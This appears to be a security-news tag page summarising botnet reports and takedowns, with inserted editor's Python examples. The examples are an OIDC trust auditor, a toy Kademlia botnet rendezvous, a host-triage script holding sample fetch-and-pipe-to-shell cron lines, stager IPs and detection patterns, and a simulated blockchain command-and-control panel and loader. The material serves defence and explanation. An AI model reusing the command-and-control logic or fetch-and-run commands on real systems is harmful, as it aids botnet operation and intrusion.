< ciso
brief />

All news with #botnet tag

116 articles · page 2 of 6

ThreatsDay: Hybrid P2P Botnet and Old Flaws Resurface

🛡️ A concise roundup of the week's notable incidents: a resilient hybrid variant of Phorpiex combines HTTP C2 polling with a P2P protocol to survive takedowns, while a 13‑year‑old chainable flaw in Apache ActiveMQ (CVE-2026-34197) can yield stealthy RCE if left unpatched. Industry data show record cyber‑fraud losses and a spike in AI‑assisted DDoS tactics. Multiple supply‑chain and platform abuses—from trojanized developer tools to malicious PyPI packages and SaaS notification phishing—underscore the need to patch, audit, and harden AI integrations.

Chaos Malware Targets Misconfigured Cloud Deployments

🔍 Cybersecurity firm Darktrace has identified a new variant of the Chaos botnet that targets misconfigured cloud deployments, expanding the malware's focus beyond routers and edge devices. The 64-bit ELF binary reached a deliberately misconfigured Hadoop honeypot through an HTTP request that submitted a new application whose launch command was a shell one-liner fetching and executing the payload from pan.tenire[.]com. The updated sample drops the SSH- and router-based spreading routines and instead implements a SOCKS proxy, so compromised hosts can relay attacker traffic, broadening the botnet's monetization and evasion options.

Botnet DDoS Escalation: AI, IoT, and Multiterabit Threats

📈 NETSCOUT’s ATLAS platform recorded more than 8 million DDoS attacks across 203 countries during the second half of 2025, revealing a decisive shift toward multiterabit capacity and AI-enabled operations. IoT-based botnets such as Aisuru and TurboMirai variants produced demonstration floods of up to 30 Tbps and 4 Gpps, while dark-web LLMs and conversational interfaces lowered the barrier to complex, multivector campaigns. Persistent pressure on DNS root servers and NTP services highlighted the importance of globally distributed, intelligence-driven defenses.

Masjesu (XorBot) Botnet: Stealthy DDoS-for-Hire Service

🛡️ Masjesu, also tracked as XorBot, is a stealthy DDoS-for-hire botnet targeting a wide range of IoT devices, including routers, gateways, cameras, DVRs and NVRs. First observed in 2023 and updated through 2024, it uses XOR-based obfuscation, avoids blocklisted address ranges (including DoD IPs), and prioritises persistence and low visibility. On start-up it binds a hard-coded TCP port (55988), then establishes persistence, disables common tools such as wget and curl, and connects to remote controllers to receive flood commands. Observed traffic is concentrated in Vietnam, Ukraine, Iran, Brazil, Kenya and India, with Vietnam accounting for nearly half of activity.

Over 1,000 Exposed ComfyUI Instances Targeted — Miner Botnet

🛡️ An active campaign is exploiting internet-exposed ComfyUI instances to recruit them into a cryptomining and proxy botnet. Censys researchers found attacker tooling that scans cloud IP ranges, abuses unsafe custom nodes for unauthenticated remote code execution, and installs miners (XMRig, lolMiner) and a Hysteria V2 proxy. The payloads persist via periodic retrieval of a ghost.sh script and use techniques such as LD_PRELOAD and chattr +i to resist removal, while a Flask-based C2 panel provides centralized control. Defenders are advised not to expose ComfyUI publicly, to require authentication, and to remove or audit any nodes that execute raw Python.

Russian Operator Gets 2-Year Term for TA551 Botnet Role

⚖️ The U.S. Department of Justice sentenced Russian national Ilya Angelov to two years in prison and fined him $100,000 for operating a botnet that enabled ransomware attacks against American companies. Angelov, 40, of Tolyatti, used aliases "milan" and "okart" and co‑managed the Russia‑based cybercriminal group TA551, which distributed malware-laden spam and sold access to compromised machines. Prosecutors say TA551 sold bot access to groups behind BitPaymer and IcedID, contributing to millions in extortion payments.

Russian Man Sentenced for Running Ransomware Botnet

🔒 Ilya Angelov, a 40-year-old Russian national who used the handles milan and okart, was sentenced to two years in prison after admitting he managed the Mario Kart phishing botnet that helped deliver ransomware. The botnet distributed malware via massive spam campaigns—up to 700,000 emails per day—and at its peak infected about 3,000 machines daily. Authorities linked the botnet to BitPaymer attacks on 72 U.S. companies, resulting in over $14 million in extortion payments.

Dismantling Major Botnets Disrupts Global DDoS Rings

🛡️ Law enforcement in Germany, Canada and the United States have jointly disrupted two of the world’s largest DDoS botnets, taking their core infrastructure offline and seizing evidence. The operation targeted Aisuru, which infected poorly secured IoT devices, and the related Kimwolf, which focused on Android and consumer devices. Authorities recovered multiple data carriers and seized five-figure cryptocurrency holdings, though arrests were limited and the criminal network is not yet fully dismantled.

Musician Pleads Guilty in $10M AI-Powered Streaming Fraud

🎵 North Carolina musician Michael Smith pleaded guilty to running a multi-year streaming fraud that generated over $10 million in illicit royalties. Smith purchased hundreds of thousands of AI-generated songs and uploaded them to Spotify, Apple Music, Amazon Music, and YouTube Music, then used automated bots routed through VPNs to create billions of fake streams between 2017 and 2024. Prosecutors say he ran more than 1,000 bot accounts, agreed to $8,091,843.64 in forfeiture, and faces up to five years in prison after pleading to one count of conspiracy to commit wire fraud.

International Takedown Disrupts Four Major IoT Botnets

🚨 U.S., German, and Canadian authorities dismantled command-and-control infrastructure used by the Aisuru, KimWolf, JackSkid, and Mossad IoT botnets, seizing virtual servers, domains, and related assets. The Justice Department says the four botnets had ensnared more than three million devices and issued hundreds of thousands of DDoS commands, including record-setting attacks by Aisuru. Private firms such as Akamai assisted, warning the campaigns disrupted ISP services and even targeted government IPs including DoDIN.

DoJ Disrupts 3 Million-Device IoT Botnets Behind 31.4 Tbps

🔒 The U.S. Department of Justice announced a court-authorized operation that disrupted command-and-control infrastructure used by multiple IoT Mirai variants, including AISURU, Kimwolf, JackSkid, and Mossad. Authorities from Canada and Germany, assisted by major vendors such as AWS, Cloudflare, and Akamai, helped dismantle networks that collectively enslaved roughly 3 million devices and enabled record-breaking DDoS attacks exceeding 30 Tbps. The action seeks to curb a cybercrime-as-a-service market that sold access to compromised DVRs, webcams, routers, and off-brand Android TVs.

Feds Disrupt Four IoT Botnets Behind Massive DDoS Attacks

🛡️ The U.S. Justice Department, with Canadian and German partners, dismantled infrastructure for four major IoT botnets — Aisuru, Kimwolf, JackSkid and Mossad — that compromised more than three million devices and launched hundreds of thousands of DDoS attacks. The action targeted U.S.-registered domains and virtual servers and aimed to stop further infections and future attacks. Law enforcement credited nearly two dozen tech firms for assisting in the operation.

Weekly Cybersecurity Recap: Chrome 0-days and Router Botnets

🔒 This weekly recap spotlights multiple high‑urgency incidents, including two actively exploited Chrome zero‑days—an out‑of‑bounds write in Skia (CVE‑2026‑3909) and an implementation flaw in V8 (CVE‑2026‑3910)—patched in Chrome 146.0.7680.75/76. It also documents large router botnets such as SocksEscort and KadNap that flash custom firmware to maintain persistence and operate as proxy services. Supply‑chain abuse reappears with UNC6426, which used stolen nx npm keys and abused GitHub→AWS OIDC trust to gain admin access and exfiltrate S3 data within 72 hours. Prioritize patching actively exploited flaws, audit OIDC/S3 trusts and router persistence, and monitor for emerging supply‑chain and AI‑agent risks.
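Editor's worked example for the OIDC trust point in the recap above (added here; not code from the recap, from GitHub or from AWS): a small evaluator that checks which GitHub Actions OIDC tokens an IAM role trust policy would accept, with a weak wildcard policy beside a pinned one and an audit that flags the weak pattern. The account ID, organisation and repository names are placeholders, and only the StringEquals and StringLike operators are modelled.

```python
"""Check which GitHub Actions OIDC tokens an IAM role trust policy would accept."""
import fnmatch

PROVIDER = "token.actions.githubusercontent.com"
OIDC_ARN = f"arn:aws:iam::123456789012:oidc-provider/{PROVIDER}"  # placeholder account id


def _trust_policy(condition):
    return {"Version": "2012-10-17", "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": OIDC_ARN},
        "Action": "sts:AssumeRoleWithWebIdentity",
        "Condition": condition,
    }]}


# Weak: wildcard sub and no aud check. Any workflow in any example-org repository,
# on any branch, tag or pull request, can assume the role.
WEAK_TRUST = _trust_policy({"StringLike": {f"{PROVIDER}:sub": "repo:example-org/*"}})

# Hardened: one repository, one branch, audience pinned to STS.
HARDENED_TRUST = _trust_policy({"StringEquals": {
    f"{PROVIDER}:aud": "sts.amazonaws.com",
    f"{PROVIDER}:sub": "repo:example-org/example-app:ref:refs/heads/main",
}})


def token_claims(sub, aud="sts.amazonaws.com"):
    """The two claims the trust policy looks at; a real token carries many more."""
    return {"sub": sub, "aud": aud}


def _match(operator, pattern, value):
    if operator == "StringEquals":
        return value == pattern
    if operator == "StringLike":          # IAM wildcards: * and ?, case-sensitive
        return fnmatch.fnmatchcase(value, pattern)
    raise ValueError(f"operator {operator} not modelled here")


def statement_allows(statement, claims):
    if statement.get("Effect") != "Allow" or statement.get("Action") != "sts:AssumeRoleWithWebIdentity":
        return False
    for operator, pairs in statement.get("Condition", {}).items():
        for key, patterns in pairs.items():
            value = claims.get(key.rsplit(":", 1)[1])   # "<provider>:sub" -> "sub"
            patterns = patterns if isinstance(patterns, list) else [patterns]
            if value is None or not any(_match(operator, p, value) for p in patterns):
                return False
    return True


def trust_allows(policy, claims):
    return any(statement_allows(s, claims) for s in policy["Statement"])


def audit_trust(policy):
    """Flag the two mistakes that make a GitHub->AWS trust over-broad."""
    findings = []
    for i, st in enumerate(policy["Statement"]):
        conds = {k: (op, v) for op, pairs in st.get("Condition", {}).items() for k, v in pairs.items()}
        sub = conds.get(f"{PROVIDER}:sub")
        if sub is None:
            findings.append(f"statement {i}: no sub condition, any token from the provider is accepted")
        elif sub[0] == "StringLike" and "*" in str(sub[1]):
            findings.append(f"statement {i}: wildcard sub {sub[1]!r} lets any matching repo or ref assume the role")
        if f"{PROVIDER}:aud" not in conds:
            findings.append(f"statement {i}: aud is not pinned to sts.amazonaws.com")
    return findings


if __name__ == "__main__":
    stray = token_claims("repo:example-org/scratch:ref:refs/heads/feature")
    print("weak allows stray repo:", trust_allows(WEAK_TRUST, stray))
    print("hardened allows stray repo:", trust_allows(HARDENED_TRUST, stray))
    print(audit_trust(WEAK_TRUST))
```

Run `audit_trust` over every role whose trust policy names the GitHub provider; a wildcard `sub` is the shape that turns one leaked npm token or one compromised repository into an AWS admin session.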

Authorities Disrupt SocksEscort Proxy Botnet Service

🚨 Authorities dismantled the criminal proxy service SocksEscort, which enslaved thousands of residential routers worldwide to operate a large-scale proxy botnet and sold anonymous access for fraud and other crimes. U.S. and European partners executed a court-authorized disruption, seizing domains and servers and freezing roughly $3.5 million in cryptocurrency. The service relied on AVrecon malware that exploited SOHO router vulnerabilities to persistently infect devices and route traffic for criminal customers.

U.S., Europe Disrupt SocksEscort Linux Proxy Network

🛡️ U.S. and European law enforcement, assisted by Lumen’s Black Lotus Labs and private partners, disrupted the SocksEscort proxy network that relied on Linux-targeting AVRecon malware to compromise edge devices. The takedown seized domains and servers, froze about $3.5 million in cryptocurrency, and disconnected listed infected routers from the service. Authorities say SocksEscort sold access to hundreds of thousands of IPs and was tied to multimillion-dollar frauds. Investigations and remediation efforts continue.

KadNap Botnet Hijacks Edge Routers Using DHT P2P Network

🛡️ Cybersecurity researchers at Black Lotus Labs have identified a novel malware family, KadNap, that has infected over 14,000 edge devices — primarily Asus routers — since first observed in August 2025. KadNap uses a custom Kademlia-based DHT to conceal its control infrastructure and build a resilient peer-to-peer botnet. Infected devices are being offered as residential proxies by a service named Doppelgänger, complicating attribution and abuse tracking.
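Editor's illustration of why a Kademlia-style DHT makes a botnet like KadNap hard to take down (added here; not Black Lotus Labs' analysis and not KadNap's code, whose protocol the report only describes as a custom Kademlia variant): a toy DHT with XOR distance, k-buckets and iterative lookup, in which the operator publishes a rendezvous record and a bot still retrieves it after a quarter of the network is knocked out. Node names, the rendezvous string and the relay address are constructed.

```python
"""Toy Kademlia DHT: how a P2P botnet can rendezvous without a fixed C2 address."""
import hashlib
import random

ID_BITS = 160
K = 8         # bucket size and lookup width (real Kademlia uses 20)
ALPHA = 3     # peers queried per lookup round


def node_id(seed):
    return int.from_bytes(hashlib.sha1(seed.encode()).digest(), "big")


def distance(a, b):
    return a ^ b                       # Kademlia's XOR metric


class Node:
    def __init__(self, name):
        self.name, self.id = name, node_id(name)
        self.buckets = [[] for _ in range(ID_BITS)]   # bucket i: peers at distance in [2^i, 2^(i+1))
        self.store = {}
        self.alive = True

    def add_peer(self, peer):
        if peer is self:
            return
        bucket = self.buckets[distance(self.id, peer.id).bit_length() - 1]
        if peer not in bucket and len(bucket) < K:   # no eviction in this toy
            bucket.append(peer)

    def closest(self, target):
        peers = [p for bucket in self.buckets for p in bucket]
        return sorted(peers, key=lambda p: distance(p.id, target))[:K]


def lookup(start, target, key=None):
    """Iterative FIND_NODE (or FIND_VALUE when key is given): (closest peers, value or None)."""
    shortlist = start.closest(target)
    queried, dead = set(), set()
    while True:
        batch = [p for p in shortlist if p.id not in queried][:ALPHA]
        if not batch:
            return shortlist, None
        for p in batch:
            queried.add(p.id)
            if not p.alive:                      # unreachable peer: forget it and move on
                dead.add(p.id)
                shortlist.remove(p)
                continue
            p.add_peer(start)                    # the contacted peer learns about the caller
            if key is not None and key in p.store:
                return shortlist, p.store[key]
            for q in p.closest(target):
                start.add_peer(q)                # the caller refreshes its table from replies
                if q is not start and q.id not in dead and q not in shortlist:
                    shortlist.append(q)
        shortlist.sort(key=lambda p: distance(p.id, target))
        del shortlist[K:]


def join(node, bootstrap):
    node.add_peer(bootstrap)
    lookup(node, node.id)                        # self-lookup fills the routing table


def publish(origin, key, value):
    holders, _ = lookup(origin, key)
    for h in holders:
        h.store[key] = value
    return holders


def retrieve(origin, key):
    return lookup(origin, key, key=key)[1]


def run_demo(n_nodes=64, n_dead=16, seed=7):
    rng = random.Random(seed)
    nodes = [Node(f"bot-{i}") for i in range(n_nodes)]
    for i in range(1, n_nodes):
        join(nodes[i], nodes[rng.randrange(i)])   # each bot bootstraps from one earlier bot
    key = node_id("rendezvous-v1")               # every bot derives this from a baked-in string
    value = "relay=203.0.113.5:443"              # constructed record the operator publishes
    holders = publish(nodes[0], key, value)
    before = retrieve(nodes[-1], key)
    # a takedown that removes n_dead random bots but misses the record holders
    others = [n for n in nodes if n not in holders and n is not nodes[-1]]
    for victim in rng.sample(others, n_dead):
        victim.alive = False
    after = retrieve(nodes[-1], key)
    return {"holders": len(holders), "before": before, "after": after}


if __name__ == "__main__":
    print(run_demo())
```

The point for defenders is in `lookup`: no bot holds a server address, only peers, and every lookup routes around peers that stop answering, so sinkholing individual nodes does not sever the channel. Disrupting such a botnet means either poisoning the DHT with many cooperating nodes or cleaning the infected devices themselves.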

KadNap botnet hijacks ASUS routers for proxy abuse

🔒 KadNap is a newly observed botnet that compromises primarily ASUS routers and other edge devices to assemble a distributed proxy network. Since August 2025 it has grown to roughly 14,000 nodes and uses a modified Kademlia Distributed Hash Table (DHT) protocol to conceal command-and-control infrastructure and complicate takedowns. Infections begin when a malicious script (aic.sh) is fetched from 212.104.141.140, which installs an ELF binary named kad and establishes persistence via a cron job that runs every 55 minutes. Researchers at Black Lotus Labs link KadNap to the Doppelganger/Faceless proxy service that sells access to infected devices, and Lumen has blocked related traffic on its network while preparing indicators of compromise.
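Editor's host-triage example covering the persistence details from three items on this page: Masjesu's hard-coded port and disabled wget/curl, the ComfyUI campaign's LD_PRELOAD and chattr +i, and KadNap's kad binary and 55-minute cron job (added here; not code from Censys, Black Lotus Labs or any of the reports). Only the indicators quoted in those items are taken from the reports; the sample artifacts are constructed, and the exact cron line, library path and download host are assumptions.

```python
"""Host triage for the persistence tricks reported above: Masjesu's fixed port and
disabled download tools, ComfyUI's LD_PRELOAD and chattr +i, KadNap's cron job."""
import re

# Indicators taken from the reports; every other value in this file is assumed.
MASJESU_PORT = 55988
KADNAP_STAGER_HOST = "212.104.141.140"
STAGER_SCRIPTS = ("ghost.sh", "aic.sh")
KADNAP_BINARY = "kad"
EXPECTED_TOOLS = ("wget", "curl")

DOWNLOAD_PIPE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash)\b")
CRON_LINE = re.compile(r"^\s*(@\w+|(?:\S+\s+){5})(.+)$")


def check_ld_preload(content):
    """Any entry in /etc/ld.so.preload on a server or IoT host deserves a look."""
    entries = [l.strip() for l in content.splitlines()]
    return [f"ld.so.preload loads {e}" for e in entries if e and not e.startswith("#")]


def check_immutable(lsattr_output):
    """Output of `lsattr -R`: flag string, then path; 'i' means chattr +i was applied."""
    findings = []
    for line in lsattr_output.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and "i" in parts[0]:
            findings.append(f"immutable flag on {parts[1]}")
    return findings


def check_cron(crontab):
    findings = []
    for line in crontab.splitlines():
        m = CRON_LINE.match(line)
        if not m or line.lstrip().startswith("#"):
            continue
        schedule, command = m.group(1).strip(), m.group(2).strip()
        reasons = []
        if KADNAP_STAGER_HOST in command:
            reasons.append(f"contacts {KADNAP_STAGER_HOST}")
        if any(s in command for s in STAGER_SCRIPTS):
            reasons.append("re-fetches a known stager script")
        if DOWNLOAD_PIPE.search(command):
            reasons.append("pipes a download into a shell")
        if re.search(rf"(^|/){KADNAP_BINARY}(\s|$)", command):
            reasons.append(f"runs a binary named {KADNAP_BINARY}")
        if reasons:
            findings.append(f"cron [{schedule}] {command}: " + ", ".join(reasons))
    return findings


def check_listeners(ss_output):
    """Output of `ss -lnt`; the bot's hard-coded port shows up as a listener."""
    findings = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[0] == "LISTEN":
            port = fields[3].rsplit(":", 1)[-1]
            if port == str(MASJESU_PORT):
                findings.append(f"listener on tcp/{port} (Masjesu hard-coded port)")
    return findings


def check_tools(which):
    """`which` maps tool name to its resolved path or None (shutil.which on a live host)."""
    return [f"{t} missing from PATH" for t in EXPECTED_TOOLS if not which.get(t)]


def triage(artifacts):
    return (check_ld_preload(artifacts["ld_preload"]) + check_immutable(artifacts["lsattr"])
            + check_cron(artifacts["crontab"]) + check_listeners(artifacts["ss"])
            + check_tools(artifacts["which"]))


# Constructed artifacts for a host showing all of the above; not real captures.
SAMPLE = {
    "ld_preload": "/usr/local/lib/libhide.so\n",
    "lsattr": "----i---------e------- /usr/local/bin/xmrig\n--------------e------- /etc/hostname\n",
    "crontab": ("# m h dom mon dow command\n"
                "0 3 * * * /usr/bin/certbot renew\n"
                "*/10 * * * * curl -fsSL http://203.0.113.7/ghost.sh | sh\n"
                "*/55 * * * * /tmp/kad\n"),
    "ss": ("State  Recv-Q Send-Q Local Address:Port Peer Address:Port\n"
           "LISTEN 0      128    0.0.0.0:22        0.0.0.0:*\n"
           "LISTEN 0      1      0.0.0.0:55988     0.0.0.0:*\n"),
    "which": {"wget": None, "curl": None, "busybox": "/bin/busybox"},
}

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

On a live host the same checks read `/etc/ld.so.preload`, `lsattr -R` over the usual drop directories, every crontab (including `/etc/cron.d`), `ss -lnt` and `shutil.which`; a missing wget or curl on a router is as telling as an extra listener, and an immutable file that nobody remembers setting is usually the miner.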

Investigating Dort: The Alleged Kimwolf Botmaster's Identity

🔎 This article analyzes public evidence tying the alleged Kimwolf botmaster—known online as Dort and by earlier handles like CPacket and M1ce—to accounts, emails and domain registrations linked to an Ottawa-based Jacob Butler. It reviews GitHub and forum footprints (jay.miner232@gmail.com / MemeClient), ties to SIM Land and LAPSUS$ activity, and allegations that Dort sold disposable-email and CAPTCHA-bypass tools. After KrebsOnSecurity published research in January 2026 that disrupted Kimwolf’s spread, Dort allegedly mounted doxing, DDoS, email-flooding and swatting campaigns against researchers and the author.

Aeternum C2: Blockchain-Based Botnet Resiliency and Evasion

🧭 Researchers disclosed a new botnet loader named Aeternum C2 that stores encrypted commands on the public Polygon blockchain, making its C2 infrastructure resistant to conventional takedowns. The native C++ loader (x86/x64) polls Polygon RPC endpoints to retrieve transactions written by a web panel implemented in Next.js. Operators can deploy multiple smart contracts, write immutable encrypted commands, and manage payloads with minimal operational cost while leveraging anti-analysis checks and AV-evasion scanning.

Aeternum Botnet Shifts C2 to Polygon Blockchain Control

⛓️ A newly discovered loader named Aeternum relocates botnet command-and-control onto the Polygon blockchain, researchers at Qrator Research Lab report. Infected machines retrieve instructions written as on-chain transactions and poll more than 50 RPC endpoints instead of contacting centralized servers or domains. The seller offers native C++ builds and a web dashboard that writes commands to smart contracts, creating a low-cost, resilient C2 channel that complicates traditional takedowns and shifts defensive emphasis to edge filtering and proactive DDoS mitigation.
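Editor's simulation of the channel described in the two Aeternum items above (added here; not Qrator's analysis and not the loader's code): an operator panel writes sealed commands as contract events on a toy ledger, and a loader reads them back through whichever public RPC endpoint still answers. The cipher is a SHA-256 counter-mode stand-in because the reports do not name the real one; the contract address, endpoint URLs, key and commands are all constructed.

```python
"""On-chain C2 channel in the style described for Aeternum: the operator's panel writes
sealed commands as contract events, loaders read them through any public RPC endpoint."""
import hashlib
import hmac
import struct


def _keystream_xor(key, nonce, data):
    # Stand-in stream cipher (SHA-256 in counter mode); the report does not name
    # Aeternum's cipher, this only makes the on-chain blob opaque.
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + nonce + struct.pack(">I", i // 32)).digest()
        out += bytes(a ^ b for a, b in zip(data[i:i + 32], block))
    return bytes(out)


def seal(key, nonce, command):
    ct = _keystream_xor(key, nonce, command.encode())
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()[:16]
    return nonce + ct + tag


def unseal(key, blob):
    nonce, ct, tag = blob[:8], blob[8:-16], blob[-16:]
    expected = hmac.new(key, nonce + ct, hashlib.sha256).digest()[:16]
    if len(blob) < 24 or not hmac.compare_digest(tag, expected):
        return None                                   # wrong key or forged entry: ignored
    return _keystream_xor(key, nonce, ct).decode()


class Chain:
    """Toy ledger: one log per transaction; the log data carries the sealed command."""
    def __init__(self):
        self.logs = []

    def send_tx(self, contract, data):
        block = len(self.logs) + 1
        self.logs.append({"address": contract.lower(), "blockNumber": hex(block),
                          "data": "0x" + data.hex()})
        return block


class RpcEndpoint:
    """One public JSON-RPC node; reachable=False models a block at the defender's edge."""
    def __init__(self, url, chain, reachable=True):
        self.url, self.chain, self.reachable = url, chain, reachable

    def call(self, method, params):
        if not self.reachable:
            raise ConnectionError(self.url)
        if method == "eth_getLogs":                   # filter object as in the real API, no topics
            flt = params[0]
            start = int(flt["fromBlock"], 16)
            return [log for log in self.chain.logs
                    if log["address"] == flt["address"].lower() and int(log["blockNumber"], 16) >= start]
        raise ValueError(method)


class Panel:
    """Operator side: each command becomes one immutable transaction."""
    def __init__(self, chain, contract, key):
        self.chain, self.contract, self.key, self.counter = chain, contract, key, 0

    def push(self, command):
        self.counter += 1                             # nonce must never repeat under one key
        return self.chain.send_tx(self.contract, seal(self.key, struct.pack(">Q", self.counter), command))


class Loader:
    """Bot side: polls endpoints in order, decrypts what it can, remembers where it got to."""
    def __init__(self, key, contract, endpoints):
        self.key, self.contract, self.endpoints = key, contract, endpoints
        self.last_block, self.received = 0, []

    def poll(self):
        for ep in self.endpoints:
            try:
                logs = ep.call("eth_getLogs", [{"address": self.contract,
                                                "fromBlock": hex(self.last_block + 1), "toBlock": "latest"}])
            except ConnectionError:
                continue                              # blocked endpoint: try the next one
            for log in logs:
                cmd = unseal(self.key, bytes.fromhex(log["data"][2:]))
                if cmd is not None:
                    self.received.append(cmd)         # a real loader would act on it here
                self.last_block = max(self.last_block, int(log["blockNumber"], 16))
            return ep.url
        return None                                   # every endpoint blocked: the only chokepoint


def run_demo():
    chain = Chain()
    contract = "0x000000000000000000000000000000000000c0de"        # constructed address
    key = hashlib.sha256(b"constructed demo key").digest()
    endpoints = [RpcEndpoint(f"https://rpc{i}.example/polygon", chain) for i in range(4)]
    panel = Panel(chain, contract, key)
    panel.push("sleep 600")
    panel.push("dl http://203.0.113.9/stage2")       # constructed, RFC 5737 address
    bot = Loader(key, contract, endpoints)
    first = bot.poll()
    # Defender blocks two endpoints and the panel host is gone; the commands stay on chain.
    endpoints[0].reachable = endpoints[1].reachable = False
    chain.send_tx(contract, b"\x00" * 40)             # someone without the key writes to the contract
    fresh_bot = Loader(key, contract, endpoints)      # host infected after the "takedown"
    second = fresh_bot.poll()
    for ep in endpoints:
        ep.reachable = False
    return {"first_endpoint": first, "received": bot.received,
            "after_block_endpoint": second, "replayed": fresh_bot.received,
            "all_blocked": fresh_bot.poll()}


if __name__ == "__main__":
    print(run_demo())
```

Two things fall out of the simulation. Seizing the panel or a domain changes nothing, because every command already written is readable by any future infection through any of the remaining endpoints; and writing to the contract without the key is harmless to the operator, since the loader discards anything that fails the tag check. The defender's lever is therefore at the edge: hosts with no business reason to speak JSON-RPC to public Polygon endpoints should not be able to, and the loader's `poll` returning `None` is the only outcome that stops it.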